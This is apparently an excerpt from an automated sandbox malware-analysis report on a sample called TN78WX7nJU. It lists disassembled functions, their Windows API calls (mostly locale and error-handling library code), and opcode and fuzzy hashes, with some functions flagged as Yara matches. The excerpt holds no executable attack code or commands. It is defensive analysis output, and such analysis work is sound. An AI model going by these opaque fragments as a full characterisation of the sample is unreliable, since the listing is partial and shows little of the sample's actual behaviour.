Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99

Function 024BB534 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,024B0A1C,?,024BBC89,00000000,?,?,?), ref: 024BB5A6

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction ID: 7e515b8481e1f4e6acfecb63905f49a3f367a1b8ffb0b433585ee7fb32156f02
Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction Fuzzy Hash: 6111E53A2007059FDB199F39C8A16BBBB92FF8475CB15482EDE8687B40D771B942CB50

Function 0043B2CD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784

Function 024BBADC Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,024BB87A,00000000,00000000,?), ref: 024BBB08

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction ID: 22e2ff09c2b26448e486839dd22a166a8aee82b80c065b84543dbf6df423df52
Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction Fuzzy Hash: B5F0F932A141156BDB299A29CC45BFB7758EF4071CF04046ADD05A3644EB70FE42CAE0

Function 0043B875 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8

Function 024BB5CF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9

EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,024B0A1C,?,024BBC4D,024B0A1C,?,?,?,?,?,024B0A1C,?,?), ref: 024BB61B

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction ID: 605a5bdb758170fdeb429ac795dbbfafa2a361accdca591ab408f29a21a6ed8b
Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction Fuzzy Hash: F7F0C2363007045FDB265F39DC81BBA7B95EF8076CF15442EFE058B650D7B19C028A64

Function 0043B368 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684

Function 024B5427 Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,024B047A,?,00000004), ref: 024B547A

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction ID: cc8a1ba2b889b976d33af3994c7ba25a8026f038811202c10f4acefb457fe579
Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction Fuzzy Hash: 1AF0BB31680318BFDB126F61DC01FAEBB66EF04F12F90415AFD0567290DA719D21AA99

Function 024B5034 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024AE654: RtlEnterCriticalSection.NTDLL(02030DAF), ref: 024AE663

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 024B506C

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction ID: 51751c5df23070daea4d4afeea8e2ce78f22671b216f8f8e3d5e9a705c77af24
Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction Fuzzy Hash: F0F04932A20304DFEB10EF69D905B9D7BE1AF15721F10426AF914DB2E1CB799944CF4A

Function 00434DCD Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49

Function 024BB4E9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,024BBCAB,024B0A1C,?,?,?,?,?,024B0A1C,?,?,?), ref: 024BB520

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction ID: 94eb1a1080926b880cd2fcfe5aca514b8a473e9c33ffa5188d5fdf0a06bed6ba
Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction Fuzzy Hash: D7F0E53A30020957CB099F3ADC557ABBF94EFC1754B5A405EEF0A8B290D7759942CBA0

Function 0043B282 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794

Function 024908CD Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00410672,0248FE60), ref: 024908D2

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 00410666 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 0043BBC1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0043BBC1

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08

Function 004373D9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105

Function 004071AB Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96

Function 024A76EB Relevance: .4, Instructions: 356COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction ID: b9dde2cb8ec5e47059e822cff3b1413f3dc4673ccaa64d593e325bcd1b1b7be9
Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction Fuzzy Hash: 61D1C7322085A24EDB3D4A39847003FFFF1AA621A530D479FD8F7CA6C6EE24D595D660

Function 024A7FCE Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 5ac7f2a9e59a8602cade0463bed8eecf15c6b405b6f14f5b51fff65f5b8fc904
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: C39136721090A34AE76E463E847513FFFE1DA612A530A079FD4F3CA2C5EF24D5A5DA20

Function 00427D67 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624

Function 024A8289 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 69c8c12ab4cd9361c634d874c37384b1242b2d74bc424703cf95b13c0a97f286
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 1E9152721090E34AEB69467E853413FFFE1DA622A530A07AFD4F2CA2C5FF24C565D620

Function 00428022 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628

Function 024A7D07 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 1b0e5a1432efdb955494ef33638bab052ade4cd867fb28aa86128775c2a79699
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 649131722090A30AEB79463D857413FFEE19A611A570A079FE4F3CF2C5EF24D655D620

Function 00427AA0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628

Function 024AD755 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction ID: 5f9d72d340cd0d95e81e904500351da7244a860c49d46dc476b9cfacc41c856c
Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction Fuzzy Hash: 5B615435E00B04D6DB386A2888B0BBF6399AF75A08F44041FE893DBFD4D715D982CB55

Function 0042D4EE Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E

Function 024A7A5D Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 40fef48657afa0c07b793ed553198580fd63280cf07076a7908ae453cb7e4604
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 2B8152722090E34AEB79467E847413FFFE15A621A630A079FD4F3CB2C5EF248665D620

Function 004277F6 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624

Function 024A87C7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: b549e255c62728a56516a23b7752254fdb945a80926b464c3fcfcc8976473489
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: B511277720104247D618CA3ED8B42BBE795FBE6228B2C567FD0514F758EB22E145D600

Function 00428560 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C

Function 009BAC43 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215370096.00000000009BA000.00000040.00000020.00020000.00000000.sdmp, Offset: 009BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ba000_TN78WX7nJU.jbxd

